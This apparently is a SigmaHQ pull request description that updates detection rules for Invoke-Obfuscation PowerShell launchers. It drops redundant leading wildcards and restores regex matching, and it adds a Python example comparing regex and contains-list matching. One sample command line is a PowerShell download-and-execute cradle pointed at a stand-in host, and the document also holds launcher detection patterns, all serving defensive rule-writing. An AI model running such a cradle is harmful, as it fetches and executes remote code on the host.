Reverted the deleted comments, @frack113, as they were there in case we wanted to revert to regex.
I reverted some CLI rules to use regex as it's much more accurate, and I don't see why we don't keep them as regex anymore. Changing them to contains is basically "regex" for a lot of EDRs/SIEMs.
Summary of the Pull Request
Remove the unnecessary starting wildcard (.*) in the regex
Changelog
update: Invoke-Obfuscation CLIP+ Launcher - PowerShell Module - Remove unnecessary starting wildcard
update: Invoke-Obfuscation STDIN+ Launcher - PowerShell Module - Remove unnecessary starting wildcard
update: Invoke-Obfuscation VAR+ Launcher - PowerShell Module - Remove unnecessary starting wildcard
update: Invoke-Obfuscation Via Stdin - PowerShell Module - Remove unnecessary starting wildcard
update: Invoke-Obfuscation Via Use Clip - PowerShell Module - Remove unnecessary starting wildcard
update: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module - Remove unnecessary starting wildcard
update: Invoke-Obfuscation CLIP+ Launcher - PowerShell - Remove unnecessary starting wildcard
update: Invoke-Obfuscation STDIN+ Launcher - Powershell - Remove unnecessary starting wildcard
update: Invoke-Obfuscation VAR+ Launcher - PowerShell - Remove unnecessary starting wildcard
update: Invoke-Obfuscation Via Stdin - Powershell - Remove unnecessary starting wildcard
update: Invoke-Obfuscation Via Use Clip - Powershell - Remove unnecessary starting wildcard
update: Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell - Remove unnecessary starting wildcard
update: Invoke-Obfuscation STDIN+ Launcher - Update rule to use regex for better accuracy in CLI
update: Invoke-Obfuscation VAR+ Launcher - Update rule to use regex for better accuracy in CLI
update: Invoke-Obfuscation Via Stdin - Update rule to use regex for better accuracy in CLI
update: Invoke-Obfuscation Via Use Clip - Update rule to use regex for better accuracy in CLI
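To make the two changelog points concrete (a leading .* adds nothing under Sigma's unanchored regex search, and a regex can express ordering that a contains list cannot), the following is an added Python example; it is not code from this PR or from SigmaHQ. It emulates the |re and |contains|all modifiers over a few constructed command lines. STDIN_LAUNCHER_RE, the fragment list and the sample lines are hypothetical illustrations of a stdin-style launcher, not the logic of any real Invoke-Obfuscation rule.

```python
import re

# Hypothetical detection regex in the style of a Sigma `CommandLine|re` value for a
# stdin-style launcher ("echo <script> | powershell ..."). Illustration only; this is
# not the pattern used by any SigmaHQ rule.
STDIN_LAUNCHER_RE = r"echo\s.*\|\s*powershell(\.exe)?\s"

# The same idea as a `CommandLine|contains|all` list: every fragment must be present,
# but neither the order nor the pipe between them can be expressed.
STDIN_LAUNCHER_FRAGMENTS = ["echo", "powershell"]

# Constructed command lines (not real Invoke-Obfuscation output, not from the PR).
SAMPLES = [
    # Resembles a stdin launcher: a script echoed into powershell reading from stdin.
    'cmd /c "echo Invoke-Expression (New-Object Net.WebClient).DownloadString(\'http://example.invalid/a\') | powershell -"',
    # Benign build step: both fragments present, but nothing is piped into powershell.
    'cmd /c "echo Building release && powershell -NoProfile -File build.ps1"',
    # Unrelated process.
    "notepad.exe C:\\Users\\jdoe\\report.txt",
]


def sigma_re(pattern, value):
    """Sigma `|re`: an unanchored regex search over the field value
    (case-sensitive unless the rule uses `|re|i`)."""
    return re.search(pattern, value) is not None


def sigma_contains_all(fragments, value):
    """Sigma `|contains|all`: every fragment is a substring of the value.
    Sigma string matching is case-insensitive, so compare lower-cased."""
    v = value.lower()
    return all(f.lower() in v for f in fragments)


def leading_wildcard_is_redundant(pattern, values):
    """True if prefixing the pattern with '.*' changes no verdict on the given values.
    Because re.search already tries every start offset, it never should."""
    return all(sigma_re(".*" + pattern, v) == sigma_re(pattern, v) for v in values)


def classify(value):
    """Verdicts of the three rule formulations for one command line."""
    return {
        "re": sigma_re(STDIN_LAUNCHER_RE, value),
        "re_leading_wildcard": sigma_re(".*" + STDIN_LAUNCHER_RE, value),
        "contains_all": sigma_contains_all(STDIN_LAUNCHER_FRAGMENTS, value),
    }


if __name__ == "__main__":
    print("leading .* redundant:", leading_wildcard_is_redundant(STDIN_LAUNCHER_RE, SAMPLES))
    for sample in SAMPLES:
        print(classify(sample), sample[:60])
```

The second sample is the point of "better accuracy in CLI": the contains list fires on a benign command line that merely mentions both words, while the regex requires the pipe into powershell. The leading .* is dropped because a search already scans every offset; on a backtracking engine the prefix only adds work, since each failed start position first consumes the rest of the line before backtracking.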
Example Log Event
N/A
Fixed Issues
N/A
SigmaHQ Rule Creation Conventions